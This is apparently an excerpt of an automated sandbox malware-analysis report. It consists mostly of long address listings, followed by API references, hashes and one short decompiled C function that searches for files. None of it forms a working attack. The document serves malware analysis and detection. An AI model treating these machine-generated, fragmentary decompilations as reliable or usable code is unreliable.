                                                                                                                            0x0040bdbe
                                                                                                                            0x0040bdc3
                                                                                                                            0x0040bdce
                                                                                                                            0x0040bdde
                                                                                                                            0x0040bde1
                                                                                                                            0x0040bdf3
                                                                                                                            0x0040bdfe
                                                                                                                            0x0040be02
                                                                                                                            0x0040be10
                                                                                                                            0x0040be14
                                                                                                                            0x0040be1f
                                                                                                                            0x0040be24
                                                                                                                            0x0040be26
                                                                                                                            0x0040c494
                                                                                                                            0x0040c494
                                                                                                                            0x0040c789
                                                                                                                            0x0040c78f
                                                                                                                            0x0040c78f
                                                                                                                            0x0040c78f
                                                                                                                            0x0040c793
                                                                                                                            0x0040c79f
                                                                                                                            0x00000000
                                                                                                                            0x0040c79f
                                                                                                                            0x0040be32
                                                                                                                            0x0040be35
                                                                                                                            0x0040be3d
                                                                                                                            0x0040be40
                                                                                                                            0x0040be44
                                                                                                                            0x0040be47
                                                                                                                            0x0040be4b
                                                                                                                            0x0040be7b
                                                                                                                            0x0040be7b
                                                                                                                            0x0040be7e
                                                                                                                            0x0040be81
                                                                                                                            0x0040be99
                                                                                                                            0x0040be99
                                                                                                                            0x0040be9c
                                                                                                                            0x0040be9f
                                                                                                                            0x0040bea2
                                                                                                                            0x0040bea4
                                                                                                                            0x0040bea9
                                                                                                                            0x0040beac
                                                                                                                            0x0040beac
                                                                                                                            0x0040beac
                                                                                                                            0x0040beaf
                                                                                                                            0x0040beb4
                                                                                                                            0x0040beba
                                                                                                                            0x0040bebd
                                                                                                                            0x0040bebf
                                                                                                                            0x0040bec3
                                                                                                                            0x0040bed0
                                                                                                                            0x0040bed0
                                                                                                                            0x0040bec5
                                                                                                                            0x0040bec9
                                                                                                                            0x0040bec9
                                                                                                                            0x0040bed6
                                                                                                                            0x0040beda
                                                                                                                            0x0040bedf
                                                                                                                            0x0040bee7
                                                                                                                            0x0040beea
                                                                                                                            0x0040beec
                                                                                                                            0x0040bef3
                                                                                                                            0x0040bef3
                                                                                                                            0x0040beee
                                                                                                                            0x0040beee
                                                                                                                            0x0040beee
                                                                                                                            0x0040bef5
                                                                                                                            0x0040bef8
                                                                                                                            0x0040beff
                                                                                                                            0x0040bf04
                                                                                                                            0x0040bf08
                                                                                                                            0x0040bf0a
                                                                                                                            0x0040bf13
                                                                                                                            0x0040bf16
                                                                                                                            0x0040bf19
                                                                                                                            0x0040bfb1
                                                                                                                            0x0040bfbb
                                                                                                                            0x0040bfca
                                                                                                                            0x0040bfcf
                                                                                                                            0x0040bfd2
                                                                                                                            0x0040bfd5
                                                                                                                            0x0040bfda
                                                                                                                            0x0040bfe2
                                                                                                                            0x0040bfe5
                                                                                                                            0x0040bfe8
                                                                                                                            0x0040bfeb
                                                                                                                            0x0040bfee
                                                                                                                            0x0040bff1
                                                                                                                            0x0040bff4
                                                                                                                            0x0040c34b
                                                                                                                            0x0040c34b
                                                                                                                            0x0040c350
                                                                                                                            0x0040c353
                                                                                                                            0x0040c358
                                                                                                                            0x0040c35e
                                                                                                                            0x0040c35e
                                                                                                                            0x0040c364
                                                                                                                            0x0040c364
                                                                                                                            0x0040c367
                                                                                                                            0x0040c36a
                                                                                                                            0x0040c36d
                                                                                                                            0x0040c370
                                                                                                                            0x0040c372
                                                                                                                            0x0040c376
                                                                                                                            0x0040c37c
                                                                                                                            0x0040c37f
                                                                                                                            0x0040c381
                                                                                                                            0x0040c385
                                                                                                                            0x0040c49e
                                                                                                                            0x0040c49e
                                                                                                                            0x0040c38b
                                                                                                                            0x0040c392
                                                                                                                            0x0040c392
                                                                                                                            0x0040c4a0
                                                                                                                            0x0040c4a2
                                                                                                                            0x0040c4a5
                                                                                                                            0x0040c4a9
                                                                                                                            0x0040c4ac
                                                                                                                            0x0040c4b1
                                                                                                                            0x0040c4b1
                                                                                                                            0x0040c4b4
                                                                                                                            0x0040c4b8
                                                                                                                            0x0040c4bb
                                                                                                                            0x0040c4bf
                                                                                                                            0x0040c50a
                                                                                                                            0x0040c50a
                                                                                                                            0x0040c50e
                                                                                                                            0x0040c512
                                                                                                                            0x0040c620
                                                                                                                            0x0040c620
                                                                                                                            0x0040c623
                                                                                                                            0x0040c625
                                                                                                                            0x0040c627
                                                                                                                            0x0040c629
                                                                                                                            0x0040c62c
                                                                                                                            0x0040c633
                                                                                                                            0x0040c635
                                                                                                                            0x0040c637
                                                                                                                            0x0040c637
                                                                                                                            0x0040c639
                                                                                                                            0x0040c639
                                                                                                                            0x0040c63c
                                                                                                                            0x0040c642
                                                                                                                            0x0040c645
                                                                                                                            0x0040c645
                                                                                                                            0x0040c64a
                                                                                                                            0x0040c64c
                                                                                                                            0x0040c64e
                                                                                                                            0x0040c660
                                                                                                                            0x0040c660
                                                                                                                            0x0040c663
                                                                                                                            0x0040c764
                                                                                                                            0x0040c769
                                                                                                                            0x0040c76c
                                                                                                                            0x0040c770
                                                                                                                            0x0040c775
                                                                                                                            0x0040c775
                                                                                                                            0x0040c778
                                                                                                                            0x00000000
                                                                                                                            0x0040c778
                                                                                                                            0x0040c669
                                                                                                                            0x0040c66c
                                                                                                                            0x0040c66f
                                                                                                                            0x0040c673
                                                                                                                            0x0040c67b
                                                                                                                            0x0040c67e
                                                                                                                            0x0040c683
                                                                                                                            0x0040c685
                                                                                                                            0x0040c687
                                                                                                                            0x0040c689
                                                                                                                            0x0040c68f
                                                                                                                            0x0040c692
                                                                                                                            0x0040c694
                                                                                                                            0x0040c698
                                                                                                                            0x0040c6d1
                                                                                                                            0x0040c6d1
                                                                                                                            0x0040c69a
                                                                                                                            0x0040c69a
                                                                                                                            0x0040c69f
                                                                                                                            0x0040c69f
                                                                                                                            0x0040c6d7
                                                                                                                            0x0040c6db
                                                                                                                            0x0040c6db
                                                                                                                            0x0040c685
                                                                                                                            0x0040c6e3
                                                                                                                            0x0040c6e6
                                                                                                                            0x0040c6e9
                                                                                                                            0x0040c6eb
                                                                                                                            0x0040c6ed
                                                                                                                            0x0040c6ed
                                                                                                                            0x0040c704
                                                                                                                            0x0040c706
                                                                                                                            0x0040c709
                                                                                                                            0x0040c70b
                                                                                                                            0x0040c70f
                                                                                                                            0x0040c714
                                                                                                                            0x0040c714
                                                                                                                            0x0040c718
                                                                                                                            0x0040c71d
                                                                                                                            0x0040c720
                                                                                                                            0x0040c724
                                                                                                                            0x0040c729
                                                                                                                            0x0040c729
                                                                                                                            0x0040c72f
                                                                                                                            0x0040c733
                                                                                                                            0x0040c73e
                                                                                                                            0x0040c742
                                                                                                                            0x0040c74e
                                                                                                                            0x0040c753
                                                                                                                            0x0040c75a
                                                                                                                            0x0040c75f
                                                                                                                            0x00000000
                                                                                                                            0x0040c650
                                                                                                                            0x0040c650
                                                                                                                            0x0040c650
                                                                                                                            0x0040c656
                                                                                                                            0x0040c658
                                                                                                                            0x0040c65b
                                                                                                                            0x0040c65c
                                                                                                                            0x0040c65c
                                                                                                                            0x00000000
                                                                                                                            0x0040c650
                                                                                                                            0x0040c64e
                                                                                                                            0x0040c518
                                                                                                                            0x0040c51a
                                                                                                                            0x0040c51a
                                                                                                                            0x0040c520
                                                                                                                            0x0040c523
                                                                                                                            0x0040c526
                                                                                                                            0x0040c52a
                                                                                                                            0x0040c52d
                                                                                                                            0x0040c531
                                                                                                                            0x0040c559
                                                                                                                            0x0040c55b
                                                                                                                            0x0040c560
                                                                                                                            0x0040c563
                                                                                                                            0x0040c578
                                                                                                                            0x0040c578
                                                                                                                            0x0040c578
                                                                                                                            0x0040c565
                                                                                                                            0x0040c565
                                                                                                                            0x0040c569
                                                                                                                            0x0040c56d
                                                                                                                            0x0040c573
                                                                                                                            0x0040c573
                                                                                                                            0x0040c582
                                                                                                                            0x0040c58d
                                                                                                                            0x0040c590
                                                                                                                            0x0040c595
                                                                                                                            0x0040c59b
                                                                                                                            0x0040c59e
                                                                                                                            0x0040c5a1
                                                                                                                            0x00000000
                                                                                                                            0x0040c5a1
                                                                                                                            0x0040c533
                                                                                                                            0x0040c542
                                                                                                                            0x0040c544
                                                                                                                            0x0040c546
                                                                                                                            0x0040c6a6
                                                                                                                            0x0040c6a9
                                                                                                                            0x0040c6ad
                                                                                                                            0x0040c6af
                                                                                                                            0x0040c6b4
                                                                                                                            0x0040c6b4
                                                                                                                            0x0040c6b7
                                                                                                                            0x0040c6ba
                                                                                                                            0x0040c6be
                                                                                                                            0x0040c6c0
                                                                                                                            0x0040c6c9
                                                                                                                            0x0040c6c9
                                                                                                                            0x00000000
                                                                                                                            0x0040c6c0
                                                                                                                            0x0040c552
                                                                                                                            0x0040c5a4
                                                                                                                            0x0040c5a4
                                                                                                                            0x0040c5a6
                                                                                                                            0x0040c5ae
                                                                                                                            0x0040c5b0
                                                                                                                            0x0040c5c2
                                                                                                                            0x0040c5c2
                                                                                                                            0x0040c5b2
                                                                                                                            0x0040c5b2
                                                                                                                            0x0040c5b5
                                                                                                                            0x0040c5b8
                                                                                                                            0x0040c5be
                                                                                                                            0x0040c5be
                                                                                                                            0x0040c5cf
                                                                                                                            0x0040c5d7
                                                                                                                            0x0040c5da
                                                                                                                            0x0040c5e7
                                                                                                                            0x0040c5eb
                                                                                                                            0x0040c5ee
                                                                                                                            0x0040c5f2
                                                                                                                            0x0040c5f5
                                                                                                                            0x0040c5f8
                                                                                                                            0x0040c5fb
                                                                                                                            0x0040c5fe
                                                                                                                            0x0040c601
                                                                                                                            0x0040c603
                                                                                                                            0x0040c608
                                                                                                                            0x0040c608
                                                                                                                            0x0040c60b
                                                                                                                            0x0040c611
                                                                                                                            0x0040c614
                                                                                                                            0x0040c614
                                                                                                                            0x0040c61d
                                                                                                                            0x00000000
                                                                                                                            0x0040c4c1
                                                                                                                            0x0040c4d4
                                                                                                                            0x0040c4dd
                                                                                                                            0x0040c4df
                                                                                                                            0x0040c4e1
                                                                                                                            0x0040c502
                                                                                                                            0x0040c507
                                                                                                                            0x00000000
                                                                                                                            0x0040c507
                                                                                                                            0x0040c4e3
                                                                                                                            0x0040c4e6
                                                                                                                            0x0040c4ea
                                                                                                                            0x0040c4ec
                                                                                                                            0x0040c4f1
                                                                                                                            0x0040c4f1
                                                                                                                            0x0040c4f4
                                                                                                                            0x0040c77d
                                                                                                                            0x0040c780
                                                                                                                            0x0040c784
                                                                                                                            0x00000000
                                                                                                                            0x0040c784
                                                                                                                            0x0040c4bf
                                                                                                                            0x0040bffa
                                                                                                                            0x0040bffa
                                                                                                                            0x0040bffd
                                                                                                                            0x0040c000
                                                                                                                            0x0040c003
                                                                                                                            0x0040c00c
                                                                                                                            0x0040c012
                                                                                                                            0x0040c01a
                                                                                                                            0x0040c01d
                                                                                                                            0x0040c01f
                                                                                                                            0x0040c021
                                                                                                                            0x0040c023
                                                                                                                            0x0040c025
                                                                                                                            0x0040c025
                                                                                                                            0x0040c028
                                                                                                                            0x0040c02c
                                                                                                                            0x0040c0c7
                                                                                                                            0x0040c0c7
                                                                                                                            0x0040c0d7
                                                                                                                            0x0040c0db
                                                                                                                            0x0040c0dd
                                                                                                                            0x0040c0e0
                                                                                                                            0x0040c0e2
                                                                                                                            0x0040c118
                                                                                                                            0x0040c118
                                                                                                                            0x0040c11a
                                                                                                                            0x0040c11e
                                                                                                                            0x0040c123
                                                                                                                            0x0040c123
                                                                                                                            0x0040c126
                                                                                                                            0x0040c12a
                                                                                                                            0x0040c13a
                                                                                                                            0x0040c13e
                                                                                                                            0x0040c140
                                                                                                                            0x0040c143
                                                                                                                            0x0040c145
                                                                                                                            0x0040c168
                                                                                                                            0x0040c168
                                                                                                                            0x0040c16a
                                                                                                                            0x0040c16e
                                                                                                                            0x0040c173
                                                                                                                            0x0040c173
                                                                                                                            0x0040c176
                                                                                                                            0x0040c179
                                                                                                                            0x0040c17d
                                                                                                                            0x0040c17f
                                                                                                                            0x0040c182
                                                                                                                            0x0040c184
                                                                                                                            0x0040c189
                                                                                                                            0x0040c18b
                                                                                                                            0x0040c18d
                                                                                                                            0x0040c18d
                                                                                                                            0x0040c18f
                                                                                                                            0x0040c18f
                                                                                                                            0x0040c192
                                                                                                                            0x0040c199
                                                                                                                            0x0040c199
                                                                                                                            0x0040c19c
                                                                                                                            0x0040c1a0
                                                                                                                            0x0040c1a4
                                                                                                                            0x0040c1a6
                                                                                                                            0x0040c1a8
                                                                                                                            0x0040c1ad
                                                                                                                            0x0040c1af
                                                                                                                            0x0040c1b1
                                                                                                                            0x0040c1b1
                                                                                                                            0x0040c1b3
                                                                                                                            0x0040c1b3
                                                                                                                            0x0040c1b6
                                                                                                                            0x0040c1bd
                                                                                                                            0x0040c1bd
                                                                                                                            0x0040c1c0
                                                                                                                            0x0040c1c4
                                                                                                                            0x0040c1c8
                                                                                                                            0x0040c1ca
                                                                                                                            0x0040c2ef
                                                                                                                            0x0040c2ef
                                                                                                                            0x0040c2f2
                                                                                                                            0x0040c2f4
                                                                                                                            0x0040c301
                                                                                                                            0x0040c307
                                                                                                                            0x0040c307
                                                                                                                            0x00000000
                                                                                                                            0x0040c307
                                                                                                                            0x0040c2f9
                                                                                                                            0x0040c2ff
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040c1d0
                                                                                                                            0x0040c1d3
                                                                                                                            0x0040c1d6
                                                                                                                            0x0040c1d9
                                                                                                                            0x0040c1dc
                                                                                                                            0x0040c1dc
                                                                                                                            0x0040c1df
                                                                                                                            0x0040c1e1
                                                                                                                            0x0040c1e4
                                                                                                                            0x0040c27d
                                                                                                                            0x0040c27d
                                                                                                                            0x0040c27d
                                                                                                                            0x0040c280
                                                                                                                            0x0040c280
                                                                                                                            0x0040c282
                                                                                                                            0x0040c298
                                                                                                                            0x0040c29a
                                                                                                                            0x0040c29d
                                                                                                                            0x0040c2b2
                                                                                                                            0x0040c2b2
                                                                                                                            0x0040c2b2
                                                                                                                            0x0040c2b5
                                                                                                                            0x0040c2b5
                                                                                                                            0x0040c2b7
                                                                                                                            0x0040c48d
                                                                                                                            0x00000000
                                                                                                                            0x0040c493
                                                                                                                            0x0040c2c5
                                                                                                                            0x0040c2c5
                                                                                                                            0x0040c2c8
                                                                                                                            0x0040c2cf
                                                                                                                            0x0040c2d1
                                                                                                                            0x0040c2d4
                                                                                                                            0x00000000
                                                                                                                            0x0040c2d4
                                                                                                                            0x0040c29f
                                                                                                                            0x0040c2a2
                                                                                                                            0x0040c2a5
                                                                                                                            0x0040c2a7
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040c2a9
                                                                                                                            0x0040c2aa
                                                                                                                            0x0040c2ad
                                                                                                                            0x0040c2b0
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040c2b0
                                                                                                                            0x00000000
                                                                                                                            0x0040c2a2
                                                                                                                            0x0040c294
                                                                                                                            0x00000000
                                                                                                                            0x0040c294
                                                                                                                            0x0040c1ea
                                                                                                                            0x0040c1ec
                                                                                                                            0x0040c1ee
                                                                                                                            0x0040c1f1
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040c1f7
                                                                                                                            0x0040c1f8
                                                                                                                            0x0040c1fb
                                                                                                                            0x0040c1fe
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040c200
                                                                                                                            0x00000000
                                                                                                                            0x0040c200
                                                                                                                            0x0040c278
                                                                                                                            0x00000000
                                                                                                                            0x0040c2d6
                                                                                                                            0x0040c2d6
                                                                                                                            0x0040c2d9
                                                                                                                            0x0040c2e0
                                                                                                                            0x0040c2e3
                                                                                                                            0x0040c2e6
                                                                                                                            0x0040c2e6
                                                                                                                            0x00000000
                                                                                                                            0x0040c1dc
                                                                                                                            0x0040c147
                                                                                                                            0x0040c147
                                                                                                                            0x0040c14e
                                                                                                                            0x0040c151
                                                                                                                            0x0040c15b
                                                                                                                            0x0040c15d
                                                                                                                            0x0040c15f
                                                                                                                            0x0040c443
                                                                                                                            0x0040c446
                                                                                                                            0x0040c44a
                                                                                                                            0x0040c44c
                                                                                                                            0x0040c451
                                                                                                                            0x0040c451
                                                                                                                            0x0040c45a
                                                                                                                            0x0040c45e
                                                                                                                            0x0040c46a
                                                                                                                            0x0040c46f
                                                                                                                            0x0040c476
                                                                                                                            0x0040c47b
                                                                                                                            0x00000000
                                                                                                                            0x0040c47b
                                                                                                                            0x0040c165
                                                                                                                            0x00000000
                                                                                                                            0x0040c165
                                                                                                                            0x0040c145
                                                                                                                            0x0040c0e4
                                                                                                                            0x0040c0e7
                                                                                                                            0x0040c0ea
                                                                                                                            0x0040c419
                                                                                                                            0x0040c41b
                                                                                                                            0x0040c41f
                                                                                                                            0x0040c424
                                                                                                                            0x0040c424
                                                                                                                            0x00000000
                                                                                                                            0x0040c41f
                                                                                                                            0x0040c0fb
                                                                                                                            0x0040c0fd
                                                                                                                            0x0040c103
                                                                                                                            0x0040c105
                                                                                                                            0x0040c105
                                                                                                                            0x0040c10a
                                                                                                                            0x0040c10c
                                                                                                                            0x0040c429
                                                                                                                            0x0040c42c
                                                                                                                            0x0040c430
                                                                                                                            0x0040c432
                                                                                                                            0x0040c43b
                                                                                                                            0x0040c43b
                                                                                                                            0x00000000
                                                                                                                            0x0040c112
                                                                                                                            0x0040c112
                                                                                                                            0x0040c115
                                                                                                                            0x00000000
                                                                                                                            0x0040c115
                                                                                                                            0x0040c032
                                                                                                                            0x0040c032
                                                                                                                            0x0040c036
                                                                                                                            0x0040c07e
                                                                                                                            0x0040c07e
                                                                                                                            0x0040c08e
                                                                                                                            0x0040c092
                                                                                                                            0x0040c094
                                                                                                                            0x0040c097
                                                                                                                            0x0040c099
                                                                                                                            0x0040c0b9
                                                                                                                            0x0040c0b9
                                                                                                                            0x0040c0bb
                                                                                                                            0x0040c0bf
                                                                                                                            0x0040c0c4
                                                                                                                            0x0040c0c4
                                                                                                                            0x00000000
                                                                                                                            0x0040c0bf
                                                                                                                            0x0040c0a0
                                                                                                                            0x0040c0a8
                                                                                                                            0x0040c0ab
                                                                                                                            0x0040c0ad
                                                                                                                            0x0040c0b0
                                                                                                                            0x0040c3d9
                                                                                                                            0x0040c3dc
                                                                                                                            0x0040c3e0
                                                                                                                            0x0040c3e2
                                                                                                                            0x0040c3e7
                                                                                                                            0x0040c3e7
                                                                                                                            0x0040c3f0
                                                                                                                            0x0040c3f4
                                                                                                                            0x0040c400
                                                                                                                            0x0040c405
                                                                                                                            0x0040c40c
                                                                                                                            0x0040c411
                                                                                                                            0x00000000
                                                                                                                            0x0040c411
                                                                                                                            0x0040c0b6
                                                                                                                            0x00000000
                                                                                                                            0x0040c0b6
                                                                                                                            0x0040c038
                                                                                                                            0x0040c048
                                                                                                                            0x0040c04c
                                                                                                                            0x0040c04e
                                                                                                                            0x0040c051
                                                                                                                            0x0040c053
                                                                                                                            0x0040c070
                                                                                                                            0x0040c070
                                                                                                                            0x0040c072
                                                                                                                            0x0040c076
                                                                                                                            0x0040c07b
                                                                                                                            0x0040c07b
                                                                                                                            0x00000000
                                                                                                                            0x0040c076
                                                                                                                            0x0040c05a
                                                                                                                            0x0040c05f
                                                                                                                            0x0040c062
                                                                                                                            0x0040c064
                                                                                                                            0x0040c067
                                                                                                                            0x0040c399
                                                                                                                            0x0040c39c
                                                                                                                            0x0040c3a0
                                                                                                                            0x0040c3a2
                                                                                                                            0x0040c3a7
                                                                                                                            0x0040c3a7
                                                                                                                            0x0040c3b0
                                                                                                                            0x0040c3b4
                                                                                                                            0x0040c3c0
                                                                                                                            0x0040c3c5
                                                                                                                            0x0040c3cc
                                                                                                                            0x0040c3d1
                                                                                                                            0x00000000
                                                                                                                            0x0040c3d1
                                                                                                                            0x0040c06d
                                                                                                                            0x00000000
                                                                                                                            0x0040c06d
                                                                                                                            0x0040c309
                                                                                                                            0x0040c315
                                                                                                                            0x0040c321
                                                                                                                            0x0040c329
                                                                                                                            0x0040c32d
                                                                                                                            0x0040c332
                                                                                                                            0x0040c335
                                                                                                                            0x0040c33c
                                                                                                                            0x0040c340
                                                                                                                            0x0040c344
                                                                                                                            0x00000000
                                                                                                                            0x0040c003
                                                                                                                            0x0040bf1f
                                                                                                                            0x0040bf22
                                                                                                                            0x0040bf28
                                                                                                                            0x0040bf2c
                                                                                                                            0x0040bf30
                                                                                                                            0x0040bf33
                                                                                                                            0x0040bf3b
                                                                                                                            0x0040bf3f
                                                                                                                            0x0040bf41
                                                                                                                            0x0040bf46
                                                                                                                            0x0040bf48
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040bf4e
                                                                                                                            0x0040bf51
                                                                                                                            0x0040bf54
                                                                                                                            0x0040bf61
                                                                                                                            0x0040bf65
                                                                                                                            0x0040c22f
                                                                                                                            0x0040c232
                                                                                                                            0x0040c236
                                                                                                                            0x0040c23e
                                                                                                                            0x0040c242
                                                                                                                            0x0040c24d
                                                                                                                            0x0040c251
                                                                                                                            0x0040c25d
                                                                                                                            0x0040c262
                                                                                                                            0x0040c269
                                                                                                                            0x0040c26e
                                                                                                                            0x00000000
                                                                                                                            0x0040c26e
                                                                                                                            0x0040bf6b
                                                                                                                            0x0040bf6e
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040bf74
                                                                                                                            0x0040bf77
                                                                                                                            0x0040bf80
                                                                                                                            0x0040bf86
                                                                                                                            0x0040bf8a
                                                                                                                            0x0040bf92
                                                                                                                            0x0040bf96
                                                                                                                            0x0040bf9b
                                                                                                                            0x0040bfa1
                                                                                                                            0x0040bfa5
                                                                                                                            0x0040bfa8
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040bfae
                                                                                                                            0x00000000
                                                                                                                            0x0040bfae
                                                                                                                            0x0040bf56
                                                                                                                            0x0040bf59
                                                                                                                            0x0040c20d
                                                                                                                            0x0040c211
                                                                                                                            0x0040c216
                                                                                                                            0x0040c219
                                                                                                                            0x0040c221
                                                                                                                            0x0040c225
                                                                                                                            0x00000000
                                                                                                                            0x0040c225
                                                                                                                            0x00000000
                                                                                                                            0x0040bf5f
                                                                                                                            0x0040c205
                                                                                                                            0x0040c209
                                                                                                                            0x00000000
                                                                                                                            0x0040bf0c
                                                                                                                            0x0040bf0c
                                                                                                                            0x00000000
                                                                                                                            0x0040bf0c
                                                                                                                            0x0040bf0a
                                                                                                                            0x0040be83
                                                                                                                            0x0040be8c
                                                                                                                            0x0040be91
                                                                                                                            0x0040be93
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040be93
                                                                                                                            0x0040be4d
                                                                                                                            0x0040be50
                                                                                                                            0x0040be52
                                                                                                                            0x0040be55
                                                                                                                            0x0040be57
                                                                                                                            0x0040be69
                                                                                                                            0x0040be6b
                                                                                                                            0x0040be6b
                                                                                                                            0x0040be77
                                                                                                                            0x0040be77
                                                                                                                            0x0040be77
                                                                                                                            0x0040be77
                                                                                                                            0x00000000
                                                                                                                            0x0040be77
                                                                                                                            0x0040be6d
                                                                                                                            0x0040be6f
                                                                                                                            0x00000000
                                                                                                                            0x0040be71
                                                                                                                            0x0040be71
                                                                                                                            0x00000000
                                                                                                                            0x0040be71
                                                                                                                            0x0040be6f
                                                                                                                            0x0040be59
                                                                                                                            0x0040be5f
                                                                                                                            0x0040be5f
                                                                                                                            0x00000000
                                                                                                                            0x0040be5f
                                                                                                                            0x0040be5b
                                                                                                                            0x0040be5d
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x0040bde3
                                                                                                                            0x0040bde3
                                                                                                                            0x0040c7a4
                                                                                                                            0x0040c7a4
                                                                                                                            0x0040c7ab
                                                                                                                            0x0040c7b0
                                                                                                                            0x0040c7b2
                                                                                                                            0x0040c7b8
                                                                                                                            0x0040c7c0
                                                                                                                            0x0040c7c0

                                                                                                                            APIs
                                                                                                                            • __EH_prolog.LIBCMT ref: 0040BD8A
                                                                                                                              • Part of subcall function 0040F0A2: _CxxThrowException.MSVCRT(?,0041C760), ref: 0040F0EB
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.289596243.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.289591053.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.289613327.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.289618199.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.289623098.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_T4IoJqcAwY.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ExceptionH_prologThrow
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 461045715-3916222277
                                                                                                                            • Opcode ID: c1b8519deddaafef617f9fc7011b9fc81cf2af7ee97f803bbd860e78a6795cb0
                                                                                                                            • Instruction ID: 9dd891245016f0e6c4d5ed255e412f020d35e1d655fa0f2a31f40bb369a830a0
                                                                                                                            • Opcode Fuzzy Hash: c1b8519deddaafef617f9fc7011b9fc81cf2af7ee97f803bbd860e78a6795cb0
                                                                                                                            • Instruction Fuzzy Hash: 91827E31900259DFDB14DFA4C884BAEBBB0BF05314F2442AEE815BB2D2D778AD45CB59
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00404B47 Relevance: 1.5, APIs: 1, Instructions: 24fileCOMMON
                                                                                                                            Download Yara Rule
                                                                                                                            C-Code - Quality: 100%
                                                                                                                            			E00404B47(void** __ecx, void* __eflags, WCHAR* _a4, intOrPtr _a8) {
				struct _WIN32_FIND_DATAW _v596;
				void* _t8;
				void** _t14;

				_t14 = __ecx;
				if(E00404B27(__ecx) == 0) {
					L2:
					return 0;
				}
				_t8 = FindFirstFileW(_a4,  &_v596); // executed
				 *_t14 = _t8;
				if(_t8 != 0xffffffff) {
					E00404B8C( &_v596, _a8, __eflags);
					return 1;
				}
				goto L2;
			}






                                                                                                                            0x00404b51
                                                                                                                            0x00404b5a
                                                                                                                            0x00404b73
                                                                                                                            0x00000000
                                                                                                                            0x00404b73
                                                                                                                            0x00404b66
                                                                                                                            0x00404b6f
                                                                                                                            0x00404b71
                                                                                                                            0x00404b80
                                                                                                                            0x00000000
                                                                                                                            0x00404b85
                                                                                                                            0x00000000

                                                                                                                            APIs
                                                                                                                              • Part of subcall function 00404B27: FindClose.KERNELBASE(00000000,000000FF,00404B58), ref: 00404B32
                                                                                                                            • FindFirstFileW.KERNELBASE(?,?), ref: 00404B66
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.289596243.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.289591053.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.289613327.000000000041B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.289618199.000000000041F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.289623098.0000000000423000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_T4IoJqcAwY.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Find$CloseFileFirst
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 2295610775-0
                                                                                                                            • Opcode ID: 71d3481ca684b1bef4711d28faad769efb473fbe63790087f208eb28159082e8
                                                                                                                            • Instruction ID: 8d5b1ebed930f7aebe848b96ddff61a25dc6a55b7fd75e971453d958bc1fd6fb
                                                                                                                            • Opcode Fuzzy Hash: 71d3481ca684b1bef4711d28faad769efb473fbe63790087f208eb28159082e8
                                                                                                                            • Instruction Fuzzy Hash: D7E092B000010456CF20AF24CC45AEA37BCAF91328F1041BAA960772D0DB38F94ACB9C
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            Function 00401014 Relevance: 49.6, APIs: 8, Strings: 20, Instructions: 609COMMON
                                                                                                                            Download Yara Rule

                                                                                                                            Control-flow Graph

                                                                                                                            • Executed
                                                                                                                            • Not Executed
